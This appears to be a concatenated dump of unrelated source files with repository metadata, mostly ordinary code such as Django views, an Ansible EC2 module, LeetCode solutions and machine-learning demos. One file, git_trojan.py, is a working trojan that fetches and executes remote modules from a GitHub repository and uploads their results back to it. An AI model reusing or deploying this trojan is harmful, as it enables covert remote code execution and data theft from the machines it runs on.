for x in cs :
if x.order >= c.order :
x.order += 1
x.save()
if x.order > max_order :
max_order = x.order
if c.order >= max_order :
c.order = max_order + 1
c.save()
else :
c = Component.objects.get(pk = request.POST['id'])
order = int(request.POST['order'])
if c.order != order :
cs = Component.objects.filter(order = order)
if len(cs) :
cs[0].order = c.order
cs[0].save()
c.order = order
c.description = request.POST['description']
c.serial_number = request.POST['serial_number']
c.odia = request.POST['odia']
c.idia = request.POST['idia']
c.fn_length = request.POST['fn_length']
c.top_conn = request.POST['top_conn']
c.pb = request.POST['pb']
c.length = request.POST['length']
c.save()
data = simplejson.dumps(c.pk)
return HttpResponse(data, mimetype="application/javascript")
def bha_component_grid_delete(request, object_id) :
run = Run.objects.get(pk=object_id)
bha = BHA.objects.get(run=run)
if request.method=='POST' :
c = Component.objects.get(pk = request.POST['id'])
order = c.order
c.delete()
cs = Component.objects.filter(bha=bha).order_by('order')
for x in range(len(cs)) :
if cs[x].order != x + 1 :
cs[x].order = x + 1
cs[x].save()
return HttpResponse('true', mimetype="application/javascript")
|
[
"andy@andy-vmdesktop.(none)"
] |
andy@andy-vmdesktop.(none)
|
252c203dd8b3c6c3ccdfa7211fa50cfc0bbb89fc
|
d6ea2105340cfdb7db3a209f69888c7312ecbce9
|
/core/commons.py
|
893e31247a7cf53186a7b1b8608b36286e7b0303
|
[] |
no_license
|
antonyflour/hometrol
|
43bbd723b190185a80e40d7064a7f68d02a7d050
|
e71360ba6170b47d809331050b3b4c204617fe6c
|
refs/heads/master
| 2021-01-19T10:17:57.792982 | 2017-05-23T20:26:23 | 2017-05-23T20:26:23 | 87,851,414 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,988 |
py
|
REG_EXP_MAC_ADDRESS = "[0-9a-f]{2}([-:])[0-9a-f]{2}(\\1[0-9a-f]{2}){4}$"
class EngineCommands:
COMMAND_ADD_SHIELD = "addShield"
COMMAND_GET_INFO_SHIELDS= "getShields"
COMMAND_DELETE_SHIELD = "deleteShield"
COMMAND_MODIFY_PIN = "modifyPin"
COMMAND_GET_SHIELD = "getShield"
COMMAND_GET_PIN = "getPin"
COMMAND_SET_PIN_STATE = "setPinState"
COMMAND_MODIFY_SHIELD = "modifyShield"
COMMAND_ADD_EVENT = "addEvent"
COMMAND_GET_INFO_EVENTS = "getEvents"
COMMAND_DELETE_EVENT = "deleteEvent"
COMMAND_GET_SYSTEM_EMAIL = "getSystemEmail"
COMMAND_ADD_SYSTEM_EMAIL = "addSystemEmail"
COMMAND_DELETE_SYSTEM_EMAIL = "deleteSystemEmail"
class URIPath:
URI_MAC = "/arduino_emulate/mac.php"
URI_OUTPUT_PIN = "/arduino_emulate/output_pin.php"
URI_INPUT_PIN = "/arduino_emulate/input_pin.php"
URI_INPUT_STATUS ="/arduino_emulate/input_status.php"
URI_OUTPUT_STATUS ="/arduino_emulate/output_status.php"
URI_SET_STATUS ="/arduino_emulate/set_out.php"
URI_TOGGLE = "/arduino_emulate/toggle.php"
'''
URI_MAC = "/mac"
URI_OUTPUT_PIN = "/output_pin"
URI_INPUT_PIN = "/input_pin"
URI_INPUT_STATUS = "/input_status"
URI_OUTPUT_STATUS = "/output_status"
URI_SET_STATUS = "/setout"
URI_TOGGLE = "/toggle"
'''
class ErrorCode:
ERROR_NOT_FOUND_NUMBER = 404
ERROR_NOT_FOUND_MSG = "Not found"
ERROR_INVALID_BODY_NUMBER = 901
ERROR_INVALID_BODY_MSG = "Invalid body"
ERROR_INVALID_CONTENT_TYPE_NUMBER = 902
ERROR_INVALID_CONTENT_TYPE_MSG = "Invalid content-type : only application/json is supported"
ERROR_INVALID_MAC_NUMBER = 903
ERROR_INVALID_MAC_MSG = "Invalid MAC Address"
ERROR_INVALID_MAC_PIN_NUMBER = 904
ERROR_INVALID_MAC_PIN_MSG = "Invalid MAC Address or Pin Number"
ERROR_PIN_NOT_FOUND_NUMBER = 905
ERROR_PIN_NOT_FOUND_MSG = "Pin not found"
ERROR_SHIELD_NOT_FOUND_NUMBER = 905
ERROR_SHIELD_NOT_FOUND_MSG = "Shield not found"
ERROR_SHIELD_COMMUNICATION_NUMBER = 906
ERROR_SHIELD_COMMUNICATION_MSG = "Impossible to connect to the shield"
ERROR_SHIELD_ALREADY_EXIST_NUMBER = 907
ERROR_SHIELD_ALREADY_EXIST_MSG = "The shield already exist"
ERROR_GENERIC_NUMBER = 908
ERROR_GENERIC_MSG = "Generic Error"
ERROR_COMMAND_NOT_RECOGNIZED_NUMBER = 909
ERROR_COMMAND_NOT_RECOGNIZED_MSG = "Command not recognized"
ERROR_CONDITION_TYPE_NOT_RECOGNIZED_NUMBER = 910
ERROR_CONDITION_TYPE_NOT_RECOGNIZED_MSG = "Condition type not recognized"
ERROR_ACTION_TYPE_NOT_RECOGNIZED_NUMBER = 911
ERROR_ACTION_TYPE_NOT_RECOGNIZED_MSG = "Action type not recognized"
ERROR_EVENT_NOT_FOUND_NUMBER = 912
ERROR_EVENT_NOT_FOUND_MSG = "Event not found"
ERROR_SYSTEM_EMAIL_ALREADY_EXISTS_NUMBER = 913
ERROR_SYSTEM_EMAIL_ALREADY_EXISTS_MSG = "System email already exists, please first remove the old one"
ERROR_TEST_EMAIL_NUMBER = 914
ERROR_TEST_EMAIL_MSG = "Test email fallito"
|
[
"antoniofarina1702@gmail.com"
] |
antoniofarina1702@gmail.com
|
ca2152782390e2a3cd07a0025946143c9aedaa23
|
9a85e9651d076c736fe57b8f957c44fd4a28e2e2
|
/002,leetcode/leetcode-343.py
|
4227901944fce5e65372cddf8a145171762e9006
|
[] |
no_license
|
Jesselinux/Data-Structures-and-Algorithms
|
609b9230caf8a39290cb3581d1106879ff029add
|
768c4d5ea75e9dd6aaf5f920accf32adf3355fdd
|
refs/heads/master
| 2020-05-21T15:35:36.144829 | 2019-09-05T06:26:04 | 2019-09-05T06:26:04 | 186,094,903 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 321 |
py
|
# leetcode-343:动态规划,beats 57.79%
class Solution:
def integerBreak(self, n: int) -> int:
sums = [0, 1]
for i in range(2, n+1):
tmp = 0
for j in range(1, i):
tmp = max(tmp, j*sums[i-j], j*(i-j))
sums.append(tmp)
return sums[n]
|
[
"wuchang508@163.com"
] |
wuchang508@163.com
|
5d857613084649081412e62cd5a3dd7998e0f1ec
|
a66460a46611483dfbdc94c7996893f427e60d97
|
/ansible/my_env/lib/python2.7/site-packages/ansible/modules/cloud/amazon/ec2_ami_facts.py
|
fe8b57e7640e37f06e0f2c3b8a4e942fbe51bad9
|
[
"MIT"
] |
permissive
|
otus-devops-2019-02/yyashkin_infra
|
06b57807dde26f94f501828c07503d6bf1d70816
|
0cd0c003884155ac922e3e301305ac202de7028c
|
refs/heads/master
| 2020-04-29T02:42:22.056724 | 2019-05-15T16:24:35 | 2019-05-15T16:24:35 | 175,780,718 | 0 | 0 |
MIT
| 2019-05-15T16:24:36 | 2019-03-15T08:37:35 |
HCL
|
UTF-8
|
Python
| false | false | 8,737 |
py
|
#!/usr/bin/python
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ec2_ami_facts
version_added: '2.5'
short_description: Gather facts about ec2 AMIs
description: Gather facts about ec2 AMIs
author:
- Prasad Katti, @prasadkatti
requirements: [ boto3 ]
options:
image_ids:
description: One or more image IDs.
aliases: [image_id]
filters:
description:
- A dict of filters to apply. Each dict item consists of a filter key and a filter value.
- See U(https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeImages.html) for possible filters.
- Filter names and values are case sensitive.
owners:
description:
- Filter the images by the owner. Valid options are an AWS account ID, self,
- or an AWS owner alias ( amazon | aws-marketplace | microsoft ).
aliases: [owner]
executable_users:
description:
- Filter images by users with explicit launch permissions. Valid options are an AWS account ID, self, or all (public AMIs).
aliases: [executable_user]
describe_image_attributes:
description:
- Describe attributes (like launchPermission) of the images found.
default: no
type: bool
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
# Note: These examples do not set authentication details, see the AWS Guide for details.
- name: gather facts about an AMI using ami-id
ec2_ami_facts:
image_ids: ami-5b488823
- name: gather facts about all AMIs with tag key Name and value webapp
ec2_ami_facts:
filters:
"tag:Name": webapp
- name: gather facts about an AMI with 'AMI Name' equal to foobar
ec2_ami_facts:
filters:
name: foobar
- name: gather facts about Ubuntu 17.04 AMIs published by Canonical (099720109477)
ec2_ami_facts:
owners: 099720109477
filters:
name: "ubuntu/images/ubuntu-zesty-17.04-*"
'''
RETURN = '''
images:
description: a list of images
returned: always
type: complex
contains:
architecture:
description: The architecture of the image
returned: always
type: string
sample: x86_64
block_device_mappings:
description: Any block device mapping entries
returned: always
type: complex
contains:
device_name:
description: The device name exposed to the instance
returned: always
type: string
sample: /dev/sda1
ebs:
description: EBS volumes
returned: always
type: complex
creation_date:
description: The date and time the image was created
returned: always
type: string
sample: '2017-10-16T19:22:13.000Z'
description:
description: The description of the AMI
returned: always
type: string
sample: ''
ena_support:
description: whether enhanced networking with ENA is enabled
returned: always
type: bool
sample: true
hypervisor:
description: The hypervisor type of the image
returned: always
type: string
sample: xen
image_id:
description: The ID of the AMI
returned: always
type: string
sample: ami-5b466623
image_location:
description: The location of the AMI
returned: always
type: string
sample: 408466080000/Webapp
image_type:
description: The type of image
returned: always
type: string
sample: machine
launch_permissions:
description: launch permissions of the ami
returned: when image is owned by calling account and describe_image_attributes is yes
type: complex
sample: [{"group": "all"}, {"user_id": "408466080000"}]
name:
description: The name of the AMI that was provided during image creation
returned: always
type: string
sample: Webapp
owner_id:
description: The AWS account ID of the image owner
returned: always
type: string
sample: '408466080000'
public:
description: whether the image has public launch permissions
returned: always
type: bool
sample: true
root_device_name:
description: The device name of the root device
returned: always
type: string
sample: /dev/sda1
root_device_type:
description: The type of root device used by the AMI
returned: always
type: string
sample: ebs
sriov_net_support:
description: whether enhanced networking is enabled
returned: always
type: string
sample: simple
state:
description: The current state of the AMI
returned: always
type: string
sample: available
tags:
description: Any tags assigned to the image
returned: always
type: complex
virtualization_type:
description: The type of virtualization of the AMI
returned: always
type: string
sample: hvm
'''
try:
from botocore.exceptions import ClientError, BotoCoreError
except ImportError:
pass
from ansible.module_utils.aws.core import AnsibleAWSModule
from ansible.module_utils.ec2 import (boto3_conn, ec2_argument_spec, get_aws_connection_info, ansible_dict_to_boto3_filter_list,
camel_dict_to_snake_dict, boto3_tag_list_to_ansible_dict)
def list_ec2_images(ec2_client, module):
image_ids = module.params.get("image_ids")
owners = module.params.get("owners")
executable_users = module.params.get("executable_users")
filters = module.params.get("filters")
owner_param = []
# describe_images is *very* slow if you pass the `Owners`
# param (unless it's self), for some reason.
# Converting the owners to filters and removing from the
# owners param greatly speeds things up.
# Implementation based on aioue's suggestion in #24886
for owner in owners:
if owner.isdigit():
if 'owner-id' not in filters:
filters['owner-id'] = list()
filters['owner-id'].append(owner)
elif owner == 'self':
# self not a valid owner-alias filter (https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeImages.html)
owner_param.append(owner)
else:
if 'owner-alias' not in filters:
filters['owner-alias'] = list()
filters['owner-alias'].append(owner)
filters = ansible_dict_to_boto3_filter_list(filters)
try:
images = ec2_client.describe_images(ImageIds=image_ids, Filters=filters, Owners=owner_param, ExecutableUsers=executable_users)
images = [camel_dict_to_snake_dict(image) for image in images["Images"]]
except (ClientError, BotoCoreError) as err:
module.fail_json_aws(err, msg="error describing images")
for image in images:
try:
image['tags'] = boto3_tag_list_to_ansible_dict(image.get('tags', []))
if module.params.get("describe_image_attributes"):
launch_permissions = ec2_client.describe_image_attribute(Attribute='launchPermission', ImageId=image['image_id'])['LaunchPermissions']
image['launch_permissions'] = [camel_dict_to_snake_dict(perm) for perm in launch_permissions]
except (ClientError, BotoCoreError) as err:
# describing launch permissions of images owned by others is not permitted, but shouldn't cause failures
pass
images.sort(key=lambda e: e.get('creation_date', '')) # it may be possible that creation_date does not always exist
module.exit_json(images=images)
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(
dict(
image_ids=dict(default=[], type='list', aliases=['image_id']),
filters=dict(default={}, type='dict'),
owners=dict(default=[], type='list', aliases=['owner']),
executable_users=dict(default=[], type='list', aliases=['executable_user']),
describe_image_attributes=dict(default=False, type='bool')
)
)
module = AnsibleAWSModule(argument_spec=argument_spec, supports_check_mode=True)
region, ec2_url, aws_connect_params = get_aws_connection_info(module, boto3=True)
if region:
ec2_client = boto3_conn(module, conn_type='client', resource='ec2', region=region, endpoint=ec2_url, **aws_connect_params)
else:
module.fail_json(msg="region must be specified")
list_ec2_images(ec2_client, module)
if __name__ == '__main__':
main()
|
[
"theyashkins@gmail.com"
] |
theyashkins@gmail.com
|
e55a2fc605a7f546f9760bd66cc1036142daa65b
|
70f3d3ab092e0656f48fce163d9c4a1baf91caec
|
/manage.py
|
5a36edabacbcf2891e80d38c9215b9b2ba7c7cb1
|
[] |
no_license
|
wq56789/Django0109
|
5cca6ff7d477d14a8a3db260b907298bd90e1812
|
cda7c9e5bc5b770d24ffec5ca5c2e7d2e94e2b51
|
refs/heads/master
| 2021-04-24T21:40:54.045733 | 2018-01-10T09:47:36 | 2018-01-10T09:47:36 | 116,754,840 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 542 |
py
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "Django0109.settings")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
|
[
"2628540889@qq.com"
] |
2628540889@qq.com
|
f4e6967c090f73bb4b1bf0ab41f5a3bf62707793
|
2480d64a4419705e453cc4e074ac121d1ae72f37
|
/_data-processing/myvirtualenv/bin/symilar
|
7efc626f908dcdc006c10617333b831cf3831880
|
[] |
no_license
|
rbdone/lotr-api
|
4e98bc668aa71fb1f176c238d024dda32facdb8c
|
1ec0a087d58fae3918a2586af878846d27ee12e1
|
refs/heads/master
| 2022-12-01T08:01:55.617851 | 2020-08-14T23:12:25 | 2020-08-14T23:12:25 | 287,639,055 | 0 | 0 | null | 2020-08-14T23:12:27 | 2020-08-14T22:58:16 | null |
UTF-8
|
Python
| false | false | 278 |
#!/media/ulrike/Daten/CODING/projects/lotr-api/data-processing/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from pylint import run_symilar
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(run_symilar())
|
[
"hello@ueberdiespree.de"
] |
hello@ueberdiespree.de
|
|
b5a639dd6e57d236d82a3261a090bd72e75c1bef
|
29336042b81ffab736a38dadcdf269296ce72c65
|
/doit_ds_algorithm_python/04/stack_test.py
|
f72381e742301d270a49aa04e537322f02d41d2f
|
[] |
no_license
|
wndms0901/algorithm
|
61dd0e6a819c7714a96062e9e7f4c1eee453971e
|
65c3b6f527ee659e89997ad8113195bd3377002b
|
refs/heads/main
| 2023-02-27T12:21:46.340051 | 2021-02-08T14:39:31 | 2021-02-08T14:39:31 | 328,971,900 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,651 |
py
|
# 고정 길이 스택 클래스(collections.deque)를 사용하기
from enum import Enum
from stack import Stack
Menu = Enum('Menu', ['푸시', '팝', '피크', '검색', '덤프', '종료'])
def select_menu() -> Menu:
"""메뉴 선택"""
s = [f'({m.value}){m.name}' for m in Menu]
while True:
print(*s, sep=' ', end='')
n = int(input(': '))
if 1 <= n <= len(Menu):
return Menu(n)
s = Stack(64) # 최대 64 개를 푸시할 수 있는 스택
while True:
print(f'현재 데이터 개수: {len(s)} / {s.capacity}')
menu = select_menu() # 메뉴 선택
if menu == Menu.푸시: # 푸시
x = int(input('데이터를 입력하세요>'))
try:
s.push(x)
except IndexError:
print('스택이 가득 차 있습니다.')
elif menu == Menu.팝: # 팝
try:
x = s.pop()
print(f'팝한 데이터는 {x}입니다.')
except IndexError:
print('스택이 비어 있습니다.')
elif menu == Menu.피크: # 피크
try:
x = s.peek()
print(f'피크한 데이터는 {x}입니다.')
except IndexError:
print('스택이 비어 있습니다.')
elif menu == Menu.검색: # 검색
x = int(input('검색 값을 입력하세요>'))
if x in s:
print(f'{s.count(x)} 개를 포함하고, 맨 앞쪽의 위치는 {s.find(x)}입니다.')
else:
print('검색 값은 포함되어 있지 않습니다.')
elif menu == Menu.덤프: # 덤프
s.dump()
else:
break
|
[
"cherry25987@gmail.com"
] |
cherry25987@gmail.com
|
284b16862546a04753ca39ee352a14563fc28272
|
eaf97194e79c31d80f7786b64bbf621581a95dec
|
/example.py
|
bba3baa0753070fdc4a03e7eb9cbacab6300db59
|
[] |
no_license
|
codesharedot/levolution-price
|
333902c32137f9a82bd9d21b26575d646e0f4bb9
|
60c9d52fa42190e4fa929ead32ca611766906005
|
refs/heads/master
| 2020-08-02T14:26:47.832555 | 2019-09-27T19:27:47 | 2019-09-27T19:27:47 | 211,388,241 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 616 |
py
|
import requests
import json
from forex_python.converter import CurrencyRates
import os
c = CurrencyRates()
rate = c.get_rate('USD', 'EUR')
print(rate)
levolution_api_url = 'https://api.coinmarketcap.com/v1/ticker/levolution/'
response = requests.get(levolution_api_url)
response_json = response.json()
print(response_json)
for coin in response.json():
price = coin.get("price_usd", "U$S Price not provided")
coin_price = float(("{0:.2f}").format(float(price)))
print("$ " + str(coin_price))
coin_price_eur = float(("{0:.2f}").format(float(price)*rate))
print("€ " + str(coin_price_eur))
|
[
"codeto@sent.com"
] |
codeto@sent.com
|
daf06ec2976e73d31fcee328355ba9e2cce230b9
|
f3f3c68e7155396deb2bad0a8c82b5df86a67501
|
/binary_tree_divide_conquer/binary_tree_max_path_sum_from_root.py
|
7ee4174e42c467009946b49b30c40d873b96b19c
|
[] |
no_license
|
libinjungle/LeetCode_Python
|
41068dc79cd4f065964b4cab39d52fedb380df2f
|
49d0831387227e69ae4067c1f5b7e828976377b4
|
refs/heads/master
| 2020-04-06T07:02:15.905469 | 2016-08-22T02:37:55 | 2016-08-22T02:37:55 | 59,625,708 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 726 |
py
|
class TreeNode(object):
def __init__(self, val):
self.val = val
self.left = None
self.right = None
class Solution(object):
def maxPathSumFromRoot(self, root):
"""
Divide_And_Conquer
max sum is equal to the max of left and right child plus the root value.
:param root:
:return:
"""
if root is None:
return 0
maxleft = self.maxPathSumFromRoot(root.left)
maxright = self.maxPathSumFromRoot(root.right)
return max(maxleft, maxright) + root.val
if __name__ == "__main__":
sol = Solution()
root = TreeNode(1)
root.left = TreeNode(2)
root.right = TreeNode(3)
root.left.left = TreeNode(4)
root.left.right = TreeNode(5)
print(sol.maxPathSumFromRoot(root))
|
[
"libinnku@gmail.com"
] |
libinnku@gmail.com
|
df3847d46c128ea4255e64467cb577d4e348b21b
|
469e3e8de616263bab857df1050d426f40c30d5c
|
/module3.py
|
5d847f0e4e820befd42f51495c91329a0d3b6499
|
[
"MIT"
] |
permissive
|
listenzcc/QuickPythonConfig
|
d487e3c35e906f84503d8992152ee79909d0da30
|
ff883c1dd2b7a23a114ec794e3d711fd5d1d15c1
|
refs/heads/main
| 2023-01-07T20:30:39.060803 | 2020-11-10T08:52:10 | 2020-11-10T08:52:10 | 306,575,328 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 371 |
py
|
# Example of using customized Config object
from Package.defines import Config
config = Config()
config.reload_logger('develop')
config.reload_cfg()
def main():
print('---------------------------------------------------------')
print(config.peek())
config.set('Module 3', 'says', 'It should be a brand new configure')
print(config.peek())
|
[
"listenzcc@mail.bnu.edu.cn"
] |
listenzcc@mail.bnu.edu.cn
|
e52c20ecaeaa12fab452e4bfc96ac0cfec2f5a02
|
bc301fd884d9efed927dbe6d25dfef11584e7739
|
/p_code/RL/MDP/mrp.py
|
1b1a9ddbcda31721c670903f13058816cd012a30
|
[] |
no_license
|
MonaHe123/coding-exercise
|
87084c1dc2553cea2413992ec00c33be6b31c27a
|
9c1db48888da9f83fa0bce47c297b070f513726e
|
refs/heads/main
| 2023-06-13T08:21:09.647454 | 2021-07-05T08:34:27 | 2021-07-05T08:34:27 | 367,765,253 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,126 |
py
|
"""
author:龚俊老婆
参考:叶强大佬
验证MRP,进行简单的轨迹回报计算
"""
#MRP包括:状态,转移概率,奖励,衰减因子
import numpy as np
from numpy.lib.shape_base import expand_dims
#状态
num_state = 7
#states' name to index
i_to_n = {}
i_to_n['0'] = 'C1'
i_to_n['1'] = 'C2'
i_to_n['2'] = 'C3'
i_to_n['3'] = 'Pass'
i_to_n['4'] = 'Pub'
i_to_n['5'] = 'FB'
i_to_n['6'] = 'Sleep'
#according to inedx to get name
#使用zip函数,可以将list进行绑定为元组
n_to_i = {}
for i,name in zip(i_to_n.keys(),i_to_n.values()):
n_to_i[name] = int(i)
#转移概率矩阵
#C1,C2,C3,PASS,PUB,FB,SLEEP
Pss = [
[0.0,0.5,0.0,0.0,0.0,0.5,0.0],
[0.0,0.0,0.8,0.0,0.0,0.0,0.2],
[0.0,0.0,0.0,0.6,0.4,0.0,0.0],
[0.0,0.0,0.0,0.0,0.0,0.0,1.0],
[0.2,0.4,0.4,0.0,0.0,0.0,0.0],
[0.1,0.0,0.0,0.0,0.0,0.9,0.0],
[0.0,0.0,0.0,0.0,0.0,0.0,1.0]
]
#reward:根据index可以直接获得在相应状态得到的奖励
reward = [-2,-2,-2,10,1,-1,0]
#衰减因子
gamma = 0.5
#计算某次轨迹的回报
def compute_return(start_index = 0,
chain = None,
gamma = 0.5)->float:
"""
Args:
start_index:chain中开始计算的位置
chain:轨迹
gamma:衰减因子
Returns:
return:回报,float
"""
#从chain的start_index开始获得的回报
G_start = 0.0
for i in range(start_index,len(chain)):
G_start += np.power(gamma,i-start_index)*reward[n_to_i[chain[i]]]
return G_start
#examples
chains = [
['C1','C2','C3','Pass','Sleep'],
['C1','FB','FB','C1','C2','Sleep'],
['C1','C2','C3','Pub','C2','C3','Pass','Sleep'],
['C1','FB','FB','C1','C2','C3','Pub','C1',\
'FB','FB','FB','C1','C2','C3','Pub','C2','Sleep']
]
example_return = []
for i in range(4):
example_return.append(compute_return(0,chains[i],0.5))
print("The return of chian {0} is {1}".format(i,example_return[i]))
#the output is as folllow:
"""
The return of chian 0 is -2.25
The return of chian 1 is -3.125
The return of chian 2 is -3.40625
The return of chian 3 is -3.196044921875
"""
|
[
"1600012917@pku.edu.cn"
] |
1600012917@pku.edu.cn
|
a87e412a4eb7af7d0d6c53b2b372fce0dbdd135b
|
a0914d6d16eb2d0e0c5fb570c9a68bc46a652ed4
|
/git_trojan.py
|
6c3412da1cadee3451999ecc3a79f6497b95dbf7
|
[] |
no_license
|
jdefrancesco/chapter0
|
8c8cc045ffd36804ead3b495f89beb824022eee0
|
d218d5d07d93e7b7d79a0a452eb99dfb4ebfacc3
|
refs/heads/master
| 2016-09-05T12:08:30.940128 | 2015-01-15T14:56:51 | 2015-01-15T14:56:51 | 29,213,052 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,703 |
py
|
#!/usr/bin/env python
import json
import base64
import sys
import time
import imp
import random
import threading
import Queue
import os
from github3 import login
PASSWD = ""
trojan_id = "abc"
trojan_config = "%s.json" % trojan_id
data_path = "data/%s/" % trojan_id
trojan_modules = []
configured = False
task_queue = Queue.Queue()
def connect_to_github():
global PASSWD
gh = login(username="jdefr89@gmail.com", password=PASSWD)
repo = gh.repository("jdefr89@gmail.com", "chapter0")
branch = repo.branch("master")
return gh, repo, branch
def get_file_contents(filepath):
gh, repo, branch = connect_to_github()
tree = branch.commit.commit.tree.recurse()
for filename in tree.tree:
if filepath in filename.path:
print "[*] Found file: %s" % filepath
blob = repo.blob(filename.__json_data['sha'])
return blob.content
return None
def get_trojan_config():
global configured
config_json = get_file_contents(trojan_config)
config = json.loads(base64.b64decode(config_json))
configured = True
for task in config:
if task['module'] not in sys.modules:
exec("import %s" % task['module'])
return config
def store_module_result(data):
gh, repo, branch = connect_to_github()
remote_path = "data/%s/%d.data" % (trojan_id, random.randint(1000, 100000))
repo.create_file(remote_path, "Commit message", base64.b64encode(data))
return
def module_runner(module):
task_queue.put(1)
result = sys.modules[module].run()
task_queue.get()
# store result in repo
store_module_result(result)
return
class GitImporter(object):
def __init__(self):
self.current_module_code = ""
def find_module(self, fullname, path=None):
if configured:
print "[*] Attempting to retrieve %s" % fullname
new_library = get_file_contents("modules/%s" % fullname)
if new_library is not None:
self.current_module_code = base64.b64decode(new_library)
return self
return None
def load_module(self, name):
module = imp.new_module(name)
exec self.current_module_code in module.__dict__
sys.modules[name] = module
return module
# Main trojan loop --
sys.meta_path = [GitImporter()]
while True:
if task_queue.empty():
config = get_trojan_config()
for task in config:
t = threading.Thread(target=module_runner, args=(task['module'],))
t.start()
time.sleep(random.randint(1, 10))
time.sleep(random.randint(1000, 10000))
|
[
"jdefr89@gmail.com"
] |
jdefr89@gmail.com
|
2d26d60da3093aabef092d3dbedd7020551ba13b
|
fc0383786c3b997a1c205749018cfc52114fc2fd
|
/docs/source/auto_examples/plot_otda_color_images.py
|
e77aec0878b6ce041a77db92a9b57d29622a5c96
|
[
"MIT"
] |
permissive
|
vfdev-5/POT
|
5a9537e6c788fe53d8dbed2e349c811e9a057b7d
|
e757b75976ece1e6e53e655852b9f8863e7b6f5a
|
refs/heads/master
| 2020-04-28T11:14:40.532459 | 2019-03-11T15:59:57 | 2019-03-11T15:59:57 | 175,230,317 | 0 | 0 |
MIT
| 2019-03-12T14:33:50 | 2019-03-12T14:33:50 | null |
UTF-8
|
Python
| false | false | 3,597 |
py
|
# -*- coding: utf-8 -*-
"""
=============================
OT for image color adaptation
=============================
This example presents a way of transferring colors between two image
with Optimal Transport as introduced in [6]
[6] Ferradans, S., Papadakis, N., Peyre, G., & Aujol, J. F. (2014).
Regularized discrete optimal transport.
SIAM Journal on Imaging Sciences, 7(3), 1853-1882.
"""
# Authors: Remi Flamary <remi.flamary@unice.fr>
# Stanislas Chambon <stan.chambon@gmail.com>
#
# License: MIT License
import numpy as np
from scipy import ndimage
import matplotlib.pylab as pl
import ot
r = np.random.RandomState(42)
def im2mat(I):
"""Converts and image to matrix (one pixel per line)"""
return I.reshape((I.shape[0] * I.shape[1], I.shape[2]))
def mat2im(X, shape):
"""Converts back a matrix to an image"""
return X.reshape(shape)
def minmax(I):
return np.clip(I, 0, 1)
##############################################################################
# Generate data
# -------------
# Loading images
I1 = ndimage.imread('../data/ocean_day.jpg').astype(np.float64) / 256
I2 = ndimage.imread('../data/ocean_sunset.jpg').astype(np.float64) / 256
X1 = im2mat(I1)
X2 = im2mat(I2)
# training samples
nb = 1000
idx1 = r.randint(X1.shape[0], size=(nb,))
idx2 = r.randint(X2.shape[0], size=(nb,))
Xs = X1[idx1, :]
Xt = X2[idx2, :]
##############################################################################
# Plot original image
# -------------------
pl.figure(1, figsize=(6.4, 3))
pl.subplot(1, 2, 1)
pl.imshow(I1)
pl.axis('off')
pl.title('Image 1')
pl.subplot(1, 2, 2)
pl.imshow(I2)
pl.axis('off')
pl.title('Image 2')
##############################################################################
# Scatter plot of colors
# ----------------------
pl.figure(2, figsize=(6.4, 3))
pl.subplot(1, 2, 1)
pl.scatter(Xs[:, 0], Xs[:, 2], c=Xs)
pl.axis([0, 1, 0, 1])
pl.xlabel('Red')
pl.ylabel('Blue')
pl.title('Image 1')
pl.subplot(1, 2, 2)
pl.scatter(Xt[:, 0], Xt[:, 2], c=Xt)
pl.axis([0, 1, 0, 1])
pl.xlabel('Red')
pl.ylabel('Blue')
pl.title('Image 2')
pl.tight_layout()
##############################################################################
# Instantiate the different transport algorithms and fit them
# -----------------------------------------------------------
# EMDTransport
ot_emd = ot.da.EMDTransport()
ot_emd.fit(Xs=Xs, Xt=Xt)
# SinkhornTransport
ot_sinkhorn = ot.da.SinkhornTransport(reg_e=1e-1)
ot_sinkhorn.fit(Xs=Xs, Xt=Xt)
# prediction between images (using out of sample prediction as in [6])
transp_Xs_emd = ot_emd.transform(Xs=X1)
transp_Xt_emd = ot_emd.inverse_transform(Xt=X2)
transp_Xs_sinkhorn = ot_emd.transform(Xs=X1)
transp_Xt_sinkhorn = ot_emd.inverse_transform(Xt=X2)
I1t = minmax(mat2im(transp_Xs_emd, I1.shape))
I2t = minmax(mat2im(transp_Xt_emd, I2.shape))
I1te = minmax(mat2im(transp_Xs_sinkhorn, I1.shape))
I2te = minmax(mat2im(transp_Xt_sinkhorn, I2.shape))
##############################################################################
# Plot new images
# ---------------
pl.figure(3, figsize=(8, 4))
pl.subplot(2, 3, 1)
pl.imshow(I1)
pl.axis('off')
pl.title('Image 1')
pl.subplot(2, 3, 2)
pl.imshow(I1t)
pl.axis('off')
pl.title('Image 1 Adapt')
pl.subplot(2, 3, 3)
pl.imshow(I1te)
pl.axis('off')
pl.title('Image 1 Adapt (reg)')
pl.subplot(2, 3, 4)
pl.imshow(I2)
pl.axis('off')
pl.title('Image 2')
pl.subplot(2, 3, 5)
pl.imshow(I2t)
pl.axis('off')
pl.title('Image 2 Adapt')
pl.subplot(2, 3, 6)
pl.imshow(I2te)
pl.axis('off')
pl.title('Image 2 Adapt (reg)')
pl.tight_layout()
pl.show()
|
[
"remi.flamary@gmail.com"
] |
remi.flamary@gmail.com
|
